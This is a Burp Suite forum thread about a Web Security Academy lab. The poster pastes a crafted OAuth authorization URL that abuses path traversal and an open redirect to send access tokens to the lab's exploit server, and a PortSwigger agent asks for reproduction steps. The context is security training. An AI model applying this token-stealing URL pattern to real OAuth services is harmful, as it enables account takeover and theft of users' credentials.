Burp Suite User Forum


Stealing OAuth access tokens via an open redirect

TIZEE | Last updated: Jan 21, 2023 02:03PM UTC

https://0a5900c503a255e2c0a2ed1f02a7003c.web-security-academy.net/auth?client_id=bafv9dae8qp24om34rrbm&redirect_uri=https://0a0000a2035e554ec06eef8d00b00056.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ad500a503b35524c06deebc01e700fb.exploit-server.net/exploit&response_type=token&nonce=399721827&scope=openid%20profile%20email

This lab shows client error: forbidden. Is something wrong in this lab? I've been trying for 6 hrs and it still shows like this.

Michelle, PortSwigger Agent | Last updated: Jan 23, 2023 03:27PM UTC

I've just been testing this out, and I've not come across the same issue yet. If this is still happening, can you tell us more about the steps you're taking?
